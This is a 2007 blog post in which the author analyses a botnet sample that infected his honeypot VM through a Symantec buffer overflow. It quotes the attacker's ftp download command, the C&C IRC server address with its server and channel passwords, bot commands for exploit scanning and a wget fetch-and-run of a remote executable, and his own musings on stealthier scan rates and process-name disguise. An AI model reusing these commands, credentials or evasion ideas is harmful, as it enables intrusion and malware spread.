9.exe running as dllhost.exe

Using the buffer overflow vulnerability associated with the Symantec client, someone from Ballymount in Ireland attempted to infect my Server 2003 VM with another fine virus specimen. Server was instructed to download via ftp from Hanyang University in Seoul. An organisation dedecated to the furtherment of learning no doubt. Perhaps viri are on the curriculum there. Anyway. Along the lines of “open 166.104.216.37 2755 user 1 1 get 9.exe”. In my (admittedly limited) experience, most viri are downloaded off the infector, not a central server. This is definitely a central server as I had two attempts from different IP’s, both pointing to this University ftp server.

Running 9.exe sets off a connecting with an IRC server at Time Telecommunications in Kuala Lumpur, Seoul on port 51555. (If you wish to join, it is at 203.121.79.136, and the server password is rOflcOmz – {roll on floor laughing coz of moronic zaniness??} ) It has to join room #bpe2# (pass p00n3d) where it is told what to do. On Server’s first day the instructions were

* Now talking in #bpe2#
* Topic is '!t kill all -s|!sftp 166.104.216.37 2755 1 1 9.exe -s|!asc netapi 30 3 0 -b -e -h -s|!asc sym 30 3 0 -b -e -h -s|!asc dcom135 30 3 0 -b -e -h -s|!asc asn139 30 3 0 -b -e -h -s|!asc lsass445 30 3 0 -b -e -h -s|!ip.wget http://www.milites-liberi.de/images/sw.exe c:\2.exe 1 -s'.

This proved my central server thesis. However, I was unable to download the sw.exe as I got the message Permission Denied, and I couldn’t figure out what I was missing. Identd? Passwords? User-Agent wrong? Anyways, the instructions had changed the next day:

[13:01] * Now talking in #bpe2#
[13:01] * Topic is '!t kill all -s|!sftp 166.104.216.37 2755 1 1 9.exe -s|!asc netapi 30 3 0 -c -e -h -s|!asc sym 30 3 0 -b -e -h -s|!asc dcom135 30 3 0 -b -e -h -s|!asc asn139 30 3 0 -b -e -h -s|!asc lsass445 30 3 0 -b -e -h -s'

As you can see, no obligatory download from Aachen anymore. Perhaps this historical reenactment society has already removed the offending file from their servers. Assuming that they are an innocent party in this of course. And why wouldn’t they be. Their homepage looks nice enough: http://milites-liberi.de/

Poor Server was also immediately set to the task of scanning for other potential victims. The scan range was on my own IP netblock, and the ports sampled were 135, 139, 445 and 2967. As indeed the masters commanded: dcom135, asn139, netapi and sym for symantec. As these scans were firewalled, I was unable to tell which IRC chat room would have been visited if Server’d found a victim. If the virus scans on local IP’s, it’s not so hard to set up a second VM with the required open ports, but this one went straight out the door again. This means setting up an “Internet” behind the local IP, and for some reason these Microsoft computers occasionally have a problem with that. It’s a bit of a todo, in other words. I did do it when I was attempting to intercept spam that was looking for open relays, but all the spam was boring “medicinal” and stocks type emails, no lovely binaries, so I dropped it.

Thus this remains unresolved. I haven’t been able to get sw.exe. And I haven’t got the room where the bots report infection success. So I don’t know how many bots there are. Sometimes IRC servers are used that give out quite a bit of detail as to the number of connections they currently have going, but this one is quiet about that. One weird thing is that Server has been given the predicate MySQL when clearly this is not how they got it in. Perhaps note was made that SQL was running? I don’t know.

What always amazes me is the rate at which these things scan. It is almost impossible to do anything on an infected computer, because it is so busy scanning. “The internet is slow” or “the internet doesn’t work” is the complaint and soon enough the victim’s drive has been reformatted or the virus removed or whatever. If only these virus people were less greedy for more victims, the virus would stay on the computer so much longer… I mean, this is also the difference between the common cold and ebola, I suppose. You can (sort of) live with the common cold. I’ve got one now. But with ebola you get reformatted pretty quickly. My virus, were I to make one, would scan at a rate of once per second, if that. Maybe even a lot less often than that. The name dllhost.exe is perfect of course. The top Google results have things like ” Description: dllhost.exe is a process belonging to Microsoft Windows Operating System” which would not arouse as much suspicion as the appearance of ghgzyxpt.exe in taskmanager, I should imagine.

3 February, 2007

Leave a Reply to This Post!

Your email address will not be published. Required fields are marked *

*

Reload Image
Enter Code*: